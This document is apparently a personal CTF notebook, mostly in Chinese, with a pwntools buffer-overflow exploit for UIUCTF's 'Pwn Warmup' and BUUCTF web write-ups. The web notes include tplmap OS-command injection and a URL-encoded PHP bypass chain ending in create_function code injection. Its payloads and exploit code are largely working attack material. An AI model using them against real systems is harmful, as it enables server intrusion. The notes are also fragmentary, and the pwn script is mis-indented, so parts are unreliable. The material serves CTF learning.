WEBPWN

UIUCTF 2021

pwn

Pwn Warmup

exp

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time    : 2021/8/1 10:01
# @Author  : upload
# @File    : Pwn Warmup.py
# @Software: PyCharm


# &give_flag = 0x80485ab


from pwn import *

context(os="linux", arch="x86", log_level="debug")

content = 0

# give_flag = 0x80485ab
give_flag = 0x565b72ad

def main():
    try:
        if content == 1:
            upload = process("./challenge")
        else:
            upload = remote("pwn-warmup.chal.uiuc.tf", 1337)
    except:
        print("[!!]The exp is content error ~")

        payload = b'a' * (0x10 + 4)
        payload = payload + p32(give_flag)
        print(payload)
        print(111111)
        upload.recvuntil("&give_flag = 0x80485ab\n")
        upload.sendline(payload)
        upload.interactive()


main()

打不通！远程连接的时候发现give_flag地址一直在变！

跟新换代太快了！算了！ 刷会题目把！

BUUweb

[WUSTCTF2020]CV Maker

知识点：后台rce

这啥呀！ 注册后！后台文件上传 getshell！没过滤的！服了！

[RootersCTF2019]I_<3_Flask

知识点：模版注入

1. Jinjia2模版注入
2. Arjun参数爆破工具
3. tplmap模版注入工具

2个工具字节秒！

PS G:\buuctf工具\Arjun-2.0-beta> python3 arjun.py -u http://e7cf1be7-69c9-461b-85fe-14b9f1f1273a.node4.buuoj.cn/ -m GET -c 200 --stable

python  tplmap.py -u 'http://e7cf1be7-69c9-461b-85fe-14b9f1f1273a.node4.buuoj.cn/?name=1*' --os-cmd  whoami

[BJDCTF2020]EzPHP

知识点：php代码审计

这个题挺不错的！

但是我本地打通了远程打不通！？？？？？

我服了！

debu=aqua_is_cute
%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a

shana[]=1
%73%68%61%6e%61%5b%5d=1
passwd[]=2
%70%61%73%73%77%64%5b%5d=2

file=data://text/plain,debu_debu_aqua
file=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61

flag[code] = !!
%66%6c%61%67%5b%63%6f%64%65%5d=!!

flag[code] = create_function
&%66%6c%61%67%5b%63%6f%64%65%5d=%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e
flag[arg] =  ;}var_dump(get_defined_vars());//


flag[arg] =;}var_dump(require(~(%8F%B7%8F%C5%D0%D0%B9%96%93%AB%9A%8D%D0%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F)));//

&%66%6c%61%67%5b%61%72%67%5d=;}var_dump(require(~%8F%B7%8F%C5%D0%D0%B9%96%93%AB%9A%8D%D0%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F));//

&%66%6c%61%67%5b%61%72%67%5d=;}var_dump(require(~(%8f%97%8f%c5%d0%d0%99%96%93%8b%9a%8d%d0%8d%9a%9e%9b%c2%9c%90%91%89%9a%8d%8b%d1%9d%9e%8c%9a%c9%cb%d2%9a%91%9c%90%9b%9a%d0%8d%9a%8c%90%8a%8d%9c%9a%c2%8d%9a%9e%ce%99%93%cb%98%d1%8f%97%8f)));//


&%66%6c%61%67%5b%61%72%67%5d=%3b%7d%76%61%72%5f%64%75%6d%70%28%67%65%74%5f%64%65%66%69%6e%65%64%5f%76%61%72%73%28%29%29%3b%2f%2f



post:

debu=__&file=!!

file=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&%73%68%61%6e%61%5b%5d=1&%70%61%73%73%77%64%5b%5d=2&


file=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0A&%73%68%61%6e%61[]=1&%70%61%73%73%77%64[]=2

18+4+6W820367809
 
    
requset(~%8F%B7%8F%C5%D0%D0%B9%96%93%AB%9A%8D%D0%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F)
    
 require(~(%8f%97%8f%c5%d0%d0%99%96%93%8b%9a%8d%d0%8d%9a%9e%9b%c2%9c%90%91%89%9a%8d%8b%d1%9d%9e%8c%9a%c9%cb%d2%9a%91%9c%90%9b%9a%d0%8d%9a%8c%90%8a%8d%9c%9a%c2%8d%9a%9e%ce%99%93%cb%98%d1%8f%97%8f))
    
   
    flag{Congratulations!Y0u_Get_thE_rea1f1114g}
http://47.94.0.250:3000/1nD3x.php
?file=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61
&%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a
&%73%68%61%6e%61%5b%5d=1
&%70%61%73%73%77%64%5b%5d=2
&%66%6c%61%67%5b%63%6f%64%65%5d=%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e
&%66%6c%61%67%5b%61%72%67%5d=;}var_dump(require(~%8F%B7%8F%C5%D0%D0%B9%96%93%AB%9A%8D%D0%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F));//

https://www.cnblogs.com/rabbittt/p/13323155.html

1 绕过**’QUERY_STRING’**，$_SERVER['QUERY_STRING']不会进行urldecode，$_GET[]会，用url编码绕过

2 preg_match('/^$/')用换行符%0a绕过

3 $_REQUEST绕过，$_REQUEST在同时接收GET和POST参数时，POST优先级更高

4 file_get_contents函数，用data伪协议绕过data://text/plain,debu_debu_aqua

5$code和$arg可控，利用$code('',$arg)进行create_function注入

https://www.cnblogs.com/-chenxs/p/11459374.html

[GYCTF2020]EasyThinking

https://blog.csdn.net/mochu7777777/article/details/105160796

ThinkPHP v6.0.0~6.0.1 任意文件操作漏洞分析

http://j0k3r.top/2020/03/02/ThinkPHP_v6.0.0_ArbitraryFileWriting/#1-%E6%90%AD%E5%BB%BA%E7%8E%AF%E5%A2%83